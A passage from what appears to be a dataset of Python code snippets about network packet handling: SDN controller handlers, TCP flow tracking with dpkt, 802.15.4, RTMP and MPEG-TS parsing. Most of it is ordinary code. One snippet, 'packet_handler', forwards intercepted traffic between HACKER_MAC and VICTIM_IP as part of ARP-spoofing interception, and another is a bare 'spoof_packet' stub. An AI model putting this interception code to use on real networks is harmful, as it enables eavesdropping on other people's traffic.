head.command)\n up = UNBindParser(info.body, info.head)\n status = up.ret['status']\n if status == GATEWAY.STATUS.SUCCESS:\n delete_terminal_new(dev_id, db, self.redis)\n else:\n logging.exception(\"[GW] Invalid command: %s.\", head.command)\n except:\n logging.exception(\"[GW] Handle SI message exception.\")\n GWException().notify()", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n \n self.do_firewall(packet, packet_in, event)", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). 
Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. 
Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def process(self, data):\n\n\t\t# Check if the 802.15.4 packet is valid\n\t\tif makeFCS(data[:-2]) != data[-2:]:\n\t\t\tprint(hue.bad(\"Received invalid packet\"))\n\t\t\treturn\n\n\t\tpacket = Dot15d4FCS(data)\n\n\t\tif packet.fcf_frametype == 2: # ACK\n\t\t\tself.last_ack = packet.seqnum", "def send_packet(self, buffer_id, raw_data, out_port, in_port):\n # We tell the switch to take the packet with id buffer_if from in_port \n # and send it to out_port\n # If the switch did not specify a buffer_id, it must have specified\n # the raw data of the packet, so in this case we tell it to send\n # the raw data\n msg = of.ofp_packet_out()\n msg.in_port = in_port\n if buffer_id != -1 and buffer_id is not None:\n # We got a buffer ID from the switch; use that\n msg.buffer_id = buffer_id\n else:\n # No buffer ID from switch -- we got the raw data\n if raw_data is None:\n # No raw_data specified -- nothing to send!\n return\n msg.data = raw_data\n \n # Add an action to send to the specified port\n if out_port == of.OFPP_FLOOD:\n # send to all active ports according to STP\n for outPort in self.ports_use:\n if outPort != in_port:\n action = of.ofp_action_output(port=outPort)\n msg.actions.append(action)\n else:\n action = of.ofp_action_output(port=out_port)\n msg.actions.append(action)\n # Send message to switch\n self.connection.send(msg)", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def setPacket(self, packet):\n\t\tself.clear()\n\t\tself.packet = packet\n\t\t\n\t\tfields = self.fields\n\t\t\n\t\tfields.append(['Reception time', '%s:%s:%s.%s' % tuple(packet.time), None])\n\t\t\n\t\tif self.packet.isInvalid:\n\t\t\treturn\n\t\t\n\t\tfields.append(['Transmission info', 'CRC passed: %s, LQI: %s, RSSI: %s' % (packet.CRCOk, 
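Several snippets above (`ingest_packet` in particular) follow the same dpkt pattern: unwrap Ethernet, check for IPv4 and TCP, then derive the payload length from the IP total length minus the two header lengths. A self-contained, hedged sketch of that pattern (the function name and returned fields are assumptions):

```python
# Standalone sketch of the dpkt dissection pattern used above; assumed helper.
import socket
import dpkt

def dissect_tcp(buf: bytes):
    eth = dpkt.ethernet.Ethernet(buf)
    if not isinstance(eth.data, dpkt.ip.IP):
        return None                      # IPv4 only in this sketch
    ip = eth.data
    if not isinstance(ip.data, dpkt.tcp.TCP):
        return None
    tcp = ip.data
    payload_len = ip.len - ip.hl * 4 - tcp.off * 4   # total - IP hdr - TCP hdr
    return {
        "src": socket.inet_ntop(socket.AF_INET, ip.src),
        "dst": socket.inet_ntop(socket.AF_INET, ip.dst),
        "sport": tcp.sport,
        "dport": tcp.dport,
        "seq": tcp.seq,
        "flags": tcp.flags,
        "payload_len": payload_len,
    }
```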
packet.LQI, packet.RSSI), None])\n\t\tfields.append(['PHY fields', '', None])\n\t\tphy = len(fields) - 1\n\t\tfields.append(['Frame length', len(packet.load), phy])\n\t\t\n\t\tfields.append(['MAC fields', '', None])\n\t\tmac = len(fields) - 1\n\t\tfields.append(['Frame control', packet.frameControl, mac])\n\t\tfields.append(['Frame Type', packet.frameType, mac])\n\t\tfields.append(['Security enabled', packet.securityEnabled, mac])\n\t\tfields.append(['Frame pending', packet.framePending, mac])\n\t\tfields.append(['Ack. request', packet.ackRequest, mac])\n\t\tfields.append(['Intra-PAN', packet.intraPAN, mac])\n\t\tfields.append(['Dest. addressing mode', packet.dstAddrMode, mac])\n\t\tfields.append(['Source addressing mode', packet.srcAddrMode, mac])\n\t\tfields.append(['Sequence number', packet.seqNumber, mac])\n\t\t\n\t\tif hasattr(packet, 'dstPANID'):\n\t\t\tfields.append(['Destination PAN-ID', packet.dstPANID, mac])\n\t\t\n\t\tif hasattr(packet, 'dstAddr'):\n\t\t\tfields.append(['Destination address', packet.dstAddr, mac])\n\t\t\n\t\tif hasattr(packet, 'srcPANID'):\n\t\t\tfields.append(['Source PAN-ID', packet.srcPANID, mac])\n\t\t\t\n\t\tif hasattr(packet, 'srcAddr'):\n\t\t\tfields.append(['Source address', packet.srcAddr, mac])\n\t\t\t\n\t\tif hasattr(packet, 'payload'):\n\t\t\tfields.append(['Payload', packet.payload, mac])\n\t\t\n\t\tif hasattr(packet, 'commandType'):\n\t\t\tfields.append(['Command type', packet.commandType, mac])\n\t\t\n\t\tif hasattr(packet, 'commandPayload'):\n\t\t\tfields.append(['Command payload', packet.commandPayload, mac])\n\t\t\n\t\tif hasattr(packet, 'superFrameSpec'):\n\t\t\tfields.append(['Superframe specification', packet.superFrameSpec, mac])\n\t\t\tsfs = len(fields) - 1\n\t\t\tfields.append(['Beacon order', packet.beaconOrder, sfs])\n\t\t\tfields.append(['Superframe order', packet.superFrameOrder, sfs])\n\t\t\tfields.append(['finalCAPSlot', packet.finalCAPSlot, sfs])\n\t\t\tfields.append(['Batt. life extension', packet.battLifeExt, sfs])\n\t\t\tfields.append(['PAN Coordinator', packet.PANCoord, sfs])\n\t\t\tfields.append(['Association permit', packet.assocPermit, sfs])\n\t\t\n\t\tif hasattr(packet, 'GTS'):\n\t\t\tfields.append(['GTS specification', packet.GTS, mac])\n\t\t\tgts = len(fields) - 1\n\t\t\tfields.append(['GTS descriptor count', packet.GTSDescrCount, gts])\n\t\t\tfields.append(['GTS permit', packet.GTSPermit, gts])\n\t\t\tif int(packet.GTSDescrCount, 16) > 0:\n\t\t\t\tfields.append(['GTS directions', packet.GTSDirections, gts])\n\t\t\t\tfields.append(['GTS descriptors list', '', gts])\n\t\t\t\tdscList = len(fields) - 1\n\t\t\t\tfor i in xrange(int(packet.GTSDescrCount, 16)):\n\t\t\t\t\tfields.append(['Descriptor #'+str(i), '', dscList])\n\t\t\t\t\td = len(fields) - 1\n\t\t\t\t\tfields.append(['Device short address', packet.GTSDescriptors[i].deviceShortAddr, d])\n\t\t\t\t\tfields.append(['GTS starting slot', packet.GTSDescriptors[i].GTSStartingSlot, d])\n\t\t\t\t\tfields.append(['GTS length', packet.GTSDescriptors[i].GTSLength, d])\n\t\t\t\n\t\t\tfields.append(['Pending addresses list', '', gts])\n\t\t\tpnd = len(fields) - 1\n\t\t\tif int(packet.numShortAddrPnd, 16) > 0 or int(packet.numShortAddrPnd, 16) > 0:\n\t\t\t\tfor i in xrange(int(self.numShortAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Short addr. #%i' % i, packet.shortAddrPndList[i], pnd])\n\n\t\t\t\tfor i in xrange(int(self.numLongAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Long addr. 
#%i' % i, packet.longAddrPndList[i], pnd])\n\t\t\n\t\tif hasattr(packet, 'bcnPayload'):\n\t\t\tfields.append(['Beacon payload', packet.bcnPayload, mac])\n\t\t\n\t\tself.beginInsertRows(QModelIndex(), 0, len(self.fields)+1)\n\t\tself.endInsertRows()\n\t\tfor field in fields:\n\t\t\tprint field", "def spoof_packet(packet):", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def _on_message(self, packet: Packet, channel_id: str):\n live_run = self.get_live_run()\n # TODO(#102) this method currently assumes that the packet's subject_id will\n # always be a valid agent in our list of agent_infos. This isn't always the case\n # when relaunching with the same URLs.\n with PACKET_PROCESSING_LATENCY.labels(packet_type=packet.type).time():\n if packet.type == PACKET_TYPE_SUBMIT_ONBOARDING:\n self._on_submit_onboarding(packet, channel_id)\n elif packet.type == PACKET_TYPE_SUBMIT_UNIT:\n self._on_submit_unit(packet, channel_id)\n self.log_metrics_for_packet(packet)\n self.last_submission_time = time.time()\n elif packet.type == PACKET_TYPE_SUBMIT_METADATA:\n self._on_submit_metadata(packet)\n elif packet.type == PACKET_TYPE_MEPHISTO_BOUND_LIVE_UPDATE:\n update_id = packet.data.get(\"update_id\")\n if update_id is not None and update_id in self.seen_update_ids:\n return # Processing duplicated packet\n self._on_live_update(packet, channel_id)\n self.log_metrics_for_packet(packet)\n self.seen_update_ids.add(update_id)\n elif packet.type == PACKET_TYPE_REGISTER_AGENT:\n self._register_agent(packet, channel_id)\n elif packet.type == PACKET_TYPE_RETURN_STATUSES:\n # Record this status response\n live_run.worker_pool.handle_updated_agent_status(packet.data)\n self.log_metrics_for_packet(packet)\n elif packet.type == PACKET_TYPE_ERROR:\n self._log_frontend_error(packet)\n self.log_metrics_for_packet(packet)\n else:\n # PACKET_TYPE_REQUEST_STATUSES, PACKET_TYPE_ALIVE,\n # PACKET_TYPE_CLIENT_BOUND_LIVE_UPDATE, PACKET_TYPE_AGENT_DETAILS\n raise Exception(f\"Unexpected packet type {packet.type}\")", "def update(self, packet):\n raise NotImplementedError", "def packet_queue(self, pkt):\n \n pkt.pos = 0\n pkt.to_process = pkt.packet_length\n \n self.out_packet.append(pkt)\n return NC.ERR_SUCCESS", "def send_pkt(self, pkt_tuple):\r\n pkt_str = str(pkt_tuple[0])\r\n tuser = pkt_tuple[1]\r\n while len(pkt_str) > self.bus_width:\r\n # at least one more word of this packet after this one\r\n tdata = pkt_str[0:self.bus_width]\r\n tvalid = 1\r\n tkeep = (1<<self.bus_width)-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)\r\n yield self.wait_sys_clks(1)\r\n pkt_str = pkt_str[self.bus_width:]\r\n # this is the last word of the packet\r\n tdata = pkt_str + '\\x00'*(self.bus_width - len(pkt_str))\r\n tvalid = 1\r\n tkeep = (1<<len(pkt_str))-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)", "def send_packet(self, packet):\n # print('sending packet')\n\n # If the packet was not set up, then make sure we have the body buffer ready to write.\n if packet.body_buffer is None:\n # print('body buffer was none')\n packet.setup()\n\n # print('we set up the packet')\n\n # DONE: stream.flush() is called automatically after the packet has been sent.\n # Flush file-object.\n 
self.stream_flush()\n\n # print('flushed stream')\n\n # TODO: Sort whether to use the stream id or not, we will only use it at the beginning of a new chunk stream.\n # if send_packet.header.chunk_stream_id not in self.chunk_channels:\n # self.chunk_channels.append(send_packet.header.chunk_stream_id)\n # else:\n # send_packet.header.chunk_type = 1\n # send_packet.header.stream_id = -1\n\n # TODO: Sort out the timestamp/timestamp delta for the packet.\n # if send_packet.header.timestamp is -1:\n # if self.timestamp is None:\n # self.timestamp = 0\n # else:\n # self.timestamp = (int(time.time())/1000) - (int(time.time()/1000))\n # Set the current timestamp as the timestamp in the header for the RtmpPacket.\n # send_packet.header.timestamp = self.timestamp\n\n # Encode the initial header before the main RTMP message.\n # rtmp_header.encode(self._rtmp_stream, packet.header)\n self._rtmp_header_handler.encode_into_stream(packet.header)\n\n # print('encoded first header into stream')\n\n # TODO: We need to chunk all formats message bodies, however we need to put into perspective\n # whether message that are to be sent are related to one another and what format it needs to be.\n\n # Write chunks into the stream.\n for i in xrange(0, packet.header.body_length, self.chunk_size):\n write_size = i + self.chunk_size\n chunk = packet.body_buffer[i:write_size]\n self._rtmp_stream.write(chunk)\n # print('writing chunk')\n\n # TODO: Why is the previous in the header encode always 0?\n # We keep on encoding a header for each part of the packet body we send, until it is equal to\n # or exceeds the length of the packet body.\n if write_size < packet.header.body_length:\n # print('continuing chunks')\n # We provide the previous packet we encoded to provide context into what we are sending.\n # TODO: The rtmp_stream is None when entering here.\n # rtmp_header.encode(self._rtmp_stream, packet.header, packet.header)\n self._rtmp_header_handler.encode_into_stream(packet.header)\n\n # print('all chunks written')\n\n # TODO: Moved to now using the RtmpPacket body as the PyAMF buffered bytestream, do we need a separate\n # variable for this, and if so, do we need to have a reset body function to reset the body?\n\n # print('[Written] %s' % repr(send_packet.header))\n\n # TODO: If we do not flush the stream after sending one packet, we might not get the reply after a while.\n self.stream_flush()", "def _handle_ordered_packet(self, packet):\n pass", "def sendPacket(self, pack):\n\t\t\n\t\tself.sendCall(pack)", "def packetReceived(self, header, body):\n raise NotImplementedError(\"Abstract method must be overridden\")", "def send_packet(self, pk):\n try:\n self.out_queue.put(pk, True, 2)\n except queue.Full:\n if self.link_error_callback:\n self.link_error_callback('RadioDriver: Could not send packet'\n ' to copter')", "def handle_packet(self, clw, address, connection, channel, name, packet, db):\n command = clw.head.command\n request = None\n if command == GATEWAY.T_MESSAGE_TYPE.LOGIN: # T1\n logging.info(\"[GW] Thread%s recv login packet:\\n%s\", name, packet)\n login.handle_login(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis) \n elif command == GATEWAY.T_MESSAGE_TYPE.HEARTBEAT: # T2\n logging.info(\"[GW] Thread%s recv heartbeat packet:\\n%s\", name, packet)\n heartbeat.handle_heartbeat(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.LOCATIONDESC: # T10\n logging.info(\"[GW] Thread%s recv locationdesc 
packet:\\n%s\", name, packet)\n locationdesc.handle_locationdesc(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.CONFIG: # T17\n logging.info(\"[GW] Thread%s recv query config packet:\\n%s\", name, packet)\n config.handle_config(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.DEFENDSTATUS: # T18, #NOTE: deprecated\n logging.info(\"[GW] Thread%s recv defend status packet:\\n%s\", name, packet)\n defend.handle_defend(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.FOBINFO: # T19 #NOTE: deprecated \n logging.info(\"[GW] Thread%s recv fob info packet:\\n%s\", name, packet)\n fob.handle_fob_info(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.SLEEPSTATUS: # T21\n logging.info(\"[GW] Thread%s recv sleep status packet:\\n%s\", name, packet)\n sleep.handle_sleep(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.FOBSTATUS: # T22, #NOTE: deprecated\n logging.info(\"[GW] Thread%s recv fob status packet:\\n%s\", name, packet)\n fob.handle_fob_status(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.RUNTIMESTATUS: # T23\n logging.info(\"[GW] Thread%s recv runtime status packet:\\n%s\", name, packet)\n runtime.handle_runtime(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.UNBINDSTATUS: # T24\n logging.info(\"[GW] Thread%s recv unbind status packet:\\n%s\", name, packet)\n unbind.handle_unbind_status(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.UNUSUALACTIVATE: # T27\n logging.info(\"[GW] Thread%s recv unusual activate packet:\\n%s\", name, packet)\n unusual.handle_unusual(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.MISC: # T28\n logging.info(\"[GW] Thread%s recv misc packet:\\n%s\", name, packet)\n misc.handle_misc(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.ACC_STATUS: # T30\n logging.info(\"[GW] Thread%s recv power status packet:\\n%s\", name, packet)\n acc.handle_acc_status(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n elif command == GATEWAY.T_MESSAGE_TYPE.ACC_STATUS_REPORT: # T31\n logging.info(\"[GW] Thread%s recv power status report packet:\\n%s\", name, packet)\n acc.handle_acc_status_report(clw, address, connection, channel, self.exchange, self.gw_binding, db, self.redis)\n else: #NOTE: otherswill be forwar to SI server\n #(T13, T14, T15, T16, T26, T29) \n logging.info(\"[GW] Thread%s recv packet from terminal:\\n%s\", name, packet)\n self.foward_packet_to_si(clw, packet, address, connection, channel, db)", "def _process_packet(self, packet):\r\n fctype = packet.fctype\r\n if fctype == FCTYPE.LOGIN:\r\n if packet.narg1 != 0:\r\n log.info(\"Login failed for user '{}' password '{}'\"\r\n .format(self.username, self.password))\r\n raise Exception(\"Login failed\")\r\n else:\r\n self.session_id = packet.nto\r\n self.uid = packet.narg2\r\n self.username = packet.smessage\r\n log.info(\"Login handshake 
completed. Logged in as '{}' with sessionId {}\"\r\n .format(self.username, self.session_id))\r\n elif fctype in (FCTYPE.DETAILS, FCTYPE.ROOMHELPER, FCTYPE.SESSIONSTATE,\r\n FCTYPE.ADDFRIEND, FCTYPE.ADDIGNORE, FCTYPE.CMESG,\r\n FCTYPE.PMESG, FCTYPE.TXPROFILE, FCTYPE.USERNAMELOOKUP,\r\n FCTYPE.MYCAMSTATE, FCTYPE.MYWEBCAM):\r\n if not ((fctype == FCTYPE.DETAILS and packet.nfrom == FCTYPE.TOKENINC)\r\n or (fctype == FCTYPE.ROOMHELPER and packet.narg2 < 100)\r\n or (fctype == FCTYPE.JOINCHAN and packet.narg2 == FCCHAN.PART)):\r\n if isinstance(packet.smessage, dict):\r\n user_level = packet.smessage.setdefault(\"lv\", None)\r\n user_id = packet.smessage.setdefault(\"uid\", None)\r\n if user_id is None:\r\n user_id = packet.aboutmodel.uid\r\n if (user_id != None and user_id != -1\r\n and (user_level != None or user_level == 4)):\r\n possiblemodel = Model.get_model(user_id, user_level == 4)\r\n if possiblemodel != None:\r\n possiblemodel.merge(packet.smessage)\r\n elif fctype == FCTYPE.TAGS:\r\n if isinstance(packet.smessage, dict):\r\n # Sometimes TAGS are so long that they're malformed JSON.\r\n # For now, just ignore those cases.\r\n for key, value in packet.smessage.items():\r\n possible_model = Model.get_model(int(key))\r\n if possible_model != None:\r\n possible_model.merge_tags(value)\r\n elif fctype == FCTYPE.BOOKMARKS:\r\n if \"bookmarks\" in packet.smessage and isinstance(packet.smessage[\"bookmarks\"], list):\r\n for bookmark in packet.smessage[\"bookmarks\"]:\r\n possible_model = Model.get_model(bookmark[\"uid\"])\r\n if possible_model != None:\r\n possible_model.merge(bookmark)\r\n elif fctype == FCTYPE.METRICS:\r\n # Note that after MFC server updates on 2017-04-18, Metrics packets are rarely,\r\n # or possibly never, sent\r\n pass\r\n elif fctype == FCTYPE.EXTDATA:\r\n if packet.nto == self.session_id and packet.narg2 == FCWOPT.REDIS_JSON:\r\n self._handle_extdata(packet.smessage)\r\n elif fctype == FCTYPE.MANAGELIST:\r\n if packet.narg2 > 0 and \"rdata\" in packet.smessage:\r\n rdata = self._process_list(packet.smessage[\"rdata\"])\r\n ntype = packet.narg2\r\n if ntype in (FCL.ROOMMATES, FCL.CAMS, FCL.FRIENDS, FCL.IGNORES) and isinstance(rdata, list):\r\n for payload in rdata:\r\n possible_model = Model.get_model(payload[\"uid\"], payload[\"lv\"] == FCLEVEL.MODEL)\r\n if possible_model != None:\r\n possible_model.merge(payload)\r\n if ntype == FCL.CAMS and not self._completed_models:\r\n self._completed_models = True\r\n self.emit(FCTYPE.CLIENT_MODELSLOADED)\r\n elif ntype == FCL.TAGS and isinstance(rdata, dict):\r\n for key, value in rdata.items():\r\n possible_model = Model.get_model(key)\r\n if possible_model != None:\r\n possible_model.merge_tags(value)\r\n if not self._completed_tags:\r\n self._completed_tags = True\r\n self.emit(FCTYPE.CLIENT_TAGSLOADED)\r\n elif fctype == FCTYPE.TKX:\r\n if \"cxid\" in packet.smessage and \"tkx\" in packet.smessage and \"ctxenc\" in packet.smessage:\r\n self.stream_cxid = packet.smessage[\"cxid\"]\r\n self.stream_password = packet.smessage[\"tkx\"]\r\n parts = packet.smessage[\"ctxenc\"].split(\"/\")\r\n self.stream_vidctx = parts[1] if len(parts) > 1 else packet.smessage[\"ctxenc\"]", "def process_byte(self, byte):\r\n if self.index == -1:\r\n if byte == 0xff:\r\n self.index = 0\r\n self.checksum = 0\r\n elif self.index == 0:\r\n if byte != 0xff:\r\n self.checksum += byte\r\n self.pkt_bytes[0] = byte\r\n self.index += 1\r\n else:\r\n self.checksum += byte\r\n self.pkt_bytes[self.index] = byte\r\n self.index += 1\r\n if self.index == 7: # 
packet complete\r\n self.index = -1\r\n if self.checksum & 0xff != 0xff:\r\n return CommanderRx.CHECKSUM\r\n self.lookv = self.pkt_bytes[0] - 128 # 0 - 255 ==> -128 - 127\r\n self.lookh = self.pkt_bytes[1] - 128\r\n self.walkv = self.pkt_bytes[2] - 128\r\n self.walkh = self.pkt_bytes[3] - 128\r\n self.button = self.pkt_bytes[4]\r\n self.ext = self.pkt_bytes[5]\r\n return CommanderRx.SUCCESS\r\n return CommanderRx.NOT_DONE", "def Parse(self):\n prev_percent_read = 0\n for packet in TS.next_packet(self._filename):\n #check_packet_formedness(packet)\n pei = TS.get_transport_error_indicator(packet)\n pusi = TS.get_payload_start(packet)\n pid = TS.get_pid(packet)\n tsc = TS.get_tsc(packet)\n\n # per .ts packet handler\n if self.OnTSPacket:\n self.OnTSPacket(packet)\n\n # Update a progress callback\n self._read_size += TS.PACKET_SIZE\n percent_read = ((self._read_size / float(self._total_filesize)) * 100)\n new_percent_read = int(percent_read * 100)\n if new_percent_read != prev_percent_read and self.Progress:\n self.Progress(self._read_size, self._total_filesize, percent_read)\n prev_percent_read = new_percent_read\n\n adaptation_field_control = TS.get_adaptation_field_control(packet)\n continuity_counter = TS.get_continuity_counter(packet)\n\n # put together PES from payloads\n payload = TS.get_payload(packet)\n if pusi == True:\n if not ES.pes_packet_check_formedness(payload):\n if pid in self._elementary_streams:\n self._elementary_streams[pid] = None\n continue\n pes_id = ES.get_pes_stream_id(payload)\n self._elementary_streams[pid] = payload\n else:\n if pid in self._elementary_streams:\n # TODO: check packet sequence counter\n if not self._elementary_streams[pid]:\n self._elementary_streams[pid] = \"\"\n self._elementary_streams[pid] += payload\n else:\n # TODO: throw. 
this situaiton means out of order packets\n pass\n if pid in self._elementary_streams and ES.pes_packet_complete(self._elementary_streams[pid]):\n # TODO: handle packet contents here (callback)\n es = self._elementary_streams[pid]\n if self.OnESPacket:\n header_size = ES.get_pes_header_length(es)\n self.OnESPacket(pid, es, header_size)", "def forward(self, srcip, packet): #gets entire packet and srcip of that packet\n # get route to send packet\n best_route = self.get_route(srcip, packet[DEST]) #is a socket\n\n sock = best_route\n\n\n jsonpack = json.dumps(packet)\n sock.sendall(jsonpack.encode())\n # TODO fix src and dest\n return True", "def _process_fin_packet(self, rudp_packet):\n self.shutdown()", "def send_packet(self, raw_packet):\n\n if self.verbose:\n print(\"< %s\" % \" \".join(\"%02x\" % i for i in raw_packet))\n\n # Send the data to the device.\n self.ftdi.write(self.ftdi.INTERFACE_A, raw_packet, async_=False)", "def to_network_layer(packet):\r\n print(f\"[to_network_layer] packet:{packet}\")", "def __parse_tree(self, packet):\n info = extract_int_data(packet[Ether])\n logger.info('Processing packet with info [%s]', info)\n\n macs = search.findall_by_attr(self.tree, info.get('srcMac'),\n name='name', maxlevel=2, maxcount=1)\n\n mac = None\n src_ip = None\n dst_ip = None\n dst_port = None\n packet_size = None\n\n if len(macs) > 0:\n mac = macs[0]\n src_ips = search.findall_by_attr(\n mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)\n if len(src_ips) is not 0:\n src_ip = src_ips[0]\n dst_ips = search.findall_by_attr(\n src_ip, info.get('dstIP'), name='name', maxlevel=2,\n maxcount=1)\n if len(dst_ips) is not 0:\n dst_ip = dst_ips[0]\n logger.info('Processing source IPs - %s', src_ips)\n dst_ports = search.findall_by_attr(\n dst_ip, info.get('dstPort'), name='name',\n maxlevel=2, maxcount=1)\n if len(dst_ports) is not 0:\n dst_port = dst_ports[0]\n packet_sizes = search.findall_by_attr(\n dst_port, info.get('packet_size'),\n name='name', maxlevel=2, maxcount=1)\n if len(packet_sizes) is not 0:\n packet_size = packet_sizes[0]\n\n return mac, src_ip, dst_ip, dst_port, packet_size", "def parse(self, data):\n self._readahead.write(data)\n buf = self._readahead.getvalue()\n if len(buf) < 4:\n return\n while len(buf) >= 4:\n size = int(buf[:4], 16)\n if size == 